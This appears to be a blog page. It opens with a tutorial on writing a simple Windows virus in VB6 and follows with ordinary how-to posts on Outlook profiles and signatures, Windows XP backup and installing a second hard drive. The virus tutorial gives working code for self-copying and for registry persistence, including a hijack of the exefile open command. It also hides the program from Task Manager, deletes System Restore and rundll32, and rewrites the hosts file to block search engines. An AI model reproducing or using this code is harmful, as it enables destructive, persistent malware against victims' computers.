OK..... talking about Viruses or Virii is really touchy subject and sometimes maybe taboo but the virus underground has much history as the hacker underground and in earlier provided anti-virus companies with copies of latest viruses to create
signatures. The virus underground earlier sought to separate itself from the hacker underground but i believe the two communites exists dependent and relying on each other as many modern blended threats show.
The virus underground has been active as early as the 1970's and still remains active though has changed faces over the years as much as the hacker underground has. These days it maybe considered a hobby by some and a way of earning some money by others and its considered criminal by some governments but whatever your view or stand is the virus underground will still persist.
Why am i writing this?
Well the answer is really simple, i don't know...anyway the more knowledge you acquire the better you can protect yourself against certain viral attacks. And the next wave or if it's not already being used is corporate espionage using viruses which all companies need to guard against. Imagine a virus or call it malware that runs on your network and informs a third party about the ongoings of your company or even send copies of your documents..i know scary stuff.
How are viruses made?
This one curious argument i came across where the guys actually had very little knowledge of what they were talking about but were still right. A virus can be written in any language....YES any language..Yes even VB6 but ofcourse the more low level the langauge the more control of the system the virus has.
To understand how a virus is made you need to understand what it is first
What is a virus?
A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability.
The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware.
Ok lets break down the different subroutines of a virus.....(NB: am considering a modular design but hey a writer can write a virus the way he feels like, its up to him/her). This is a simplistict view of a virus assuming a non-resident virus. A resident virus would required modification of the different routines.
The different required subroutines of a virus would be:
This is the routine that searches for files to infect on a disk
This routine copies the viral code into the target file or directory depending on the viral spread mechanism.
There are very many vectors of infection used by viruses. Viruses have targeted various types of transmission media or hosts. This list is not exhaustive:
3. anti-detection routines
Various anti-detection routines are employed modern viruses some of which include use of stealth(for example trapping OS messages through API hooking), self modification, polymophic code and many others
I would like to think each virus has a payload even if its annoying the hell out of us or overwriting files, deleting files. Displaying really really annoying windows and the like.....though some writer are really creative.
Where is our simple virus?
Ok...cool down we are getting to that part...now that we know some basic information about viruses let us delve into the evil art of virus writing. Back in the day ...ok not that far back virus writers needed to be conversant with assembly programming or even have advanced skills in c,C++ and such languages but assembly was a must because it provided greater control of the system making
the virus absolutely wicked(read very good). But as years passed more HLL are being employed to create worms, viruses and many forms of malware.
Ok enough yapping lets try to create a simple virus using the old language(not that old) of vb6....follwing the modular design
mentioned above plus modifications.
NB: The code is left intentionally sketchy because of any malicious guys reading this....yeah i know your out there<wink>
1. Search routine
We dont need a search routine because we are not infecting any files
FileCopy App.Path & "\" & App.EXEName & ".EXE", "Drive:\Path\Name.exe"
NB: ofcourse a little more intelligence is required....eg detecting when a USB device is plugged in (man i love legacy vb code, its like english)
Ahh forgot on important code...to ensure out virus runs when the system starts...regedit anyone Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f", vbHide
This command will make your application start with windows.
Another startup method??
Shell "REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f", vbHide
This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example.
3. anti-detection routine
Really these are all simple lines of code
On Error Resume Next
This command will allow the application to continue running even if an error occurs instead of terminating/closing.
This command will hide the application from even being seen on the victims screen even if your program has it's settings set to Visible|True
App.TaskVisible = False
This command is even better, this command will stop your program from showing up in Task Manager-Applications Tab List, but it will still show up in process list...too bad
Now vb6 was truly beautifully easy and nice...but also nasty if in the wrong hands...lets see some sample payloads
Deleting some system files and control panel elements
Kill "%SystemRoot%\syst" & "em32\dfrg.msc"
Kill "%SystemRoot%\syste" & "m32\wscui.cpl"
Kill "C:\Program Files\Co" & "mmon Files\Microsoft Shared\MSInfo\msinfo32.exe"
Kill "%SystemRoot%\syste" & "m32\restore\rstrui.exe"
Kill "c:\WINDOWS\syste" & "m32\rundll32.exe"
Getting rid of System Restore, Rundll(by deleting this file, the victim can no longer view the properties window for any file on his or her computer)
Just something to help stop the victim from google-ing what the virus has done, and getting information or downloads to help rid them of your infection.
Open "c:\WINDOWS\system32\drivers\etc\hosts" For Output As #1
Print #1, "220.127.116.11 18.104.22.168 "
Print #1, "22.214.171.124 www.google.com"
Print #1, "126.96.36.199 www.google.co.uk"
Print #1, "188.8.131.52 www.yahoo.com"
Print #1, "184.108.40.206 www.yahoo.co.uk"
Print #1, "220.127.116.11 www.askjeeves.com"
Print #1, "18.104.22.168 www.altavista.com"
Print #1, "22.214.171.124 www.alltheweb.com"
Print #1, "126.96.36.199 www.msn.com"
Print #1, "188.8.131.52 www.hotmail.com"
Print #1, "184.108.40.206 www.myspace.com"
Print #1, "220.127.116.11 www.plunder.com"
Print #1, "18.104.22.168 www.quicksharing.com"
Print #1, "22.214.171.124 www.myspace.co.uk"
Ok...we can go on and on but the list is endless...its up to the virus writer to be as creative as he wants otherwise you have the basic knowledge but protection from infection even without an anti-virus is possible but with very many creative execution techniques being employed by virus writers its becoming extremly difficult...a more recent example cites a vulnerabilty in adobe
reader whereby malicious code could be executed without the user even opening the file...just keep your anti-virus uptodate.
Till next time.....
This is an anti-virus project being conducted in conjuction with Jospeh of intrusecurity, please give us any suggestions of what you would like your anti-virus to do...or not to do..
check out the project progress at http://cybus.ashemug.com
This information is intended for education purposes and the author is not responsible for any misuse or damage caused if tried on a system without permission.
Sometime back I wrote steps on how to configure Microsoft outlook and Microsoft outlook express.
Today I want to add something important that can be useful to you incase you have more than one email address and you want to use the same email application to download emails.
These steps help you to avoid mixing emails.
Microsoft Outlook Express; follow the steps below:-
The reasons why I prefer creating profiles or identities for emails is that, you can clearly separate your emails as per your account details and yet at same time your using one application of your choice.
Computers are perhaps the most significant invention of the 20th century. Most companies and individuals rely on them. We tend to perform simple tasks to life changing ones from writing a multi billion dollar proposal to simple ones like sending an email and this entirely end up being saved on a computer hard disk. With such activities on your pc could probably encounter some sort of malfunction or hiccup that causes you to either lose productivity or worse, all your work.
To avoid such incidence Microsoft Windows XP was created with a program called Windows XP Back Up application. This can help you to backup all your data and save you from the expensive recovery process. Safely store your data and be retrievable should your hard drive crash -- though if you have corrupted data, this option may not be as helpful.
Hey buddies thought this would be important so I came up with couple of steps on how you can have your contact details or signature into any of email application of your choice.
You have successfully added your contact details into your M/S outlook emails.
Microsoft Outlook Express:
NOTE: signature settings option must be activated in order to see your signature when sending emails.
Incase you have something easier, better that can help all of us regarding signature add-post it through the comment section.
These days storage space has become an issue in our daily life, it is no longer
documents alone that cover lest space, we now store video, audio, images and all other sorts of data that take a lot space. So let’s look how we can add more space in our computer.
Before we start the process of adding a drive, we need to do a small amount of research inside your machine. The goal of the research is to find out if it will be easy or not so easy to add the new hard drive. We also need to find out what kind of drive you need to buy. You may be able to do this research by reading through your computer's manuals, but it is far easier to simply open the case and look inside, since most of these machines are assembled.
The first question to answer is: How many hard disk drives have already been installed inside the case? In the majority of machines, the answer to this question is "one." Having only one hard disk drive installed makes it easy to install another one. After you open up your computer's case and look inside, you will probably find one optical drive (a CD or DVD drive), a single hard disk drive and perhaps a floppy disk drive. The optical and floppy drives will be easy to find because you can see them on the outside of the case. The hard drive may take a little searching. If you have no idea what a hard drive looks like, look at the photo above.
If there are already two drives installed inside your case, then adding a new one is more difficult.
Is there space available to add another hard-disk drive? Your current hard disk is probably mounted in a small metal cage or rack inside the machine. Make sure there is space available in the cage for another drive. If not, adding an external drive is an option.¬
An external drive connects to your computer through either a USB 2.0 connection or a FireWire connection, so your computer needs to have USB 2.0 or FireWire connectors. Once you buy the drive, all you have to do is connect it and fire up your computer. The drive will come with configuration instructions, but on Windows XP it will likely be plug-and-play. You can start saving files on your new drive immediately.
There is one big advantage to an external drive: you can plug it into multiple machines and move files around. You can take it with you anywhere you go. The only real disadvantage is that it will be slower than an internal drive. If it takes a minute to copy a gigabyte of data on an internal drive, it might take two minutes on an external drive. That may or may not be important depending on what you want to do. For most applications, the slower speed is irrelevant.
Find out what type of cable system is used to connect drives to the motherboard. There are two systems in common use: IDE drives (also known as PATA, or Parallel ATA), and SATA (Serial ATA) drives. PATA drives have wide, flat cables or thick cables as wide as your finger, while SATA drives have thin cables about the diameter of a pencil. You will need to know whether to buy an IDE or SATA drive, and you should be able to tell by looking at the cables.
Now that you have confirmed that there is space to install a new drive in your machine and you know what type of drive you need (PATA or SATA), you can buy a new drive.
You can buy a new hard drive from many different places: a retail store, a large computer store, a local computer parts store or by mail order. Wherever you go to buy it buy it, keep three things in mind:
Before we start working with the drive, we need to talk about static electricity. Your computer is highly sensitive to static shocks. This means that if you build up static electricity on your body and a shock passes from your body to something like a hard drive, that hard drive is dead and you will have to buy another one. ¬
The way to eliminate static electricity is by grounding yourself. There are lots of ways to do this, but probably the easiest way is to wear a grounding bracelet on your wrist. Then you connect the bracelet to something grounded (like a copper pipe or the center screw on a wall outlet's face plate). By connecting yourself to ground, you eliminate the possibility of static shock. You can get a bracelet for a few dollars.
First, set the jumpers (if it is an IDE drive). Let's talk about this in more detail, because most people have IDE drives.
In the IDE system, most motherboards allow you to have two IDE cables. Each cable can connect to two drives. Usually you use one cable to connect one or two optical drives to your machine. The other cable is used to connect one or two hard drives to your machine.
You want both hard drives to be on the same cable. The two drives on the cable are called "master" and "slave." You want your existing hard drive (which contains the operating system and all of your current data) to be the "master" and the new hard drive to be the "slave." The drive should have instructions on them that tell you how to set the jumpers for master and slave. So read the instructions and set the jumpers. If you are using SATA drives, you do not need to set jumpers for master and slave because each drive gets its own cable.
Now that the jumpers are set correctly, mount the new drive in your drive cage and screw it into place.
Next, plug in the drive's power connector to the power supply. If it fits, then it's a match.
Connect the IDE or SATA cable to the drive.
Close the machine, power it up and configure your new drive using the Windows XP drive administration tool. To do this, click the Start button, open the Control Panel, Switch to Classic View, click on Administrative Tools, click on Computer Management, click on Disk Management.
Look at the graphical area in the bottom right of this display. Disk 0 is your original hard drive. Disk 1 is the new hard drive. Chances are that the new drive will not be initialized, or formatted. Click the small button to initialize the drive, and then format it as an NTFS volume (right click on the new drive, then click “Format...”). Formatting may take an hour or more, so be patient.
When the formatting is done, you are ready to use your new drive.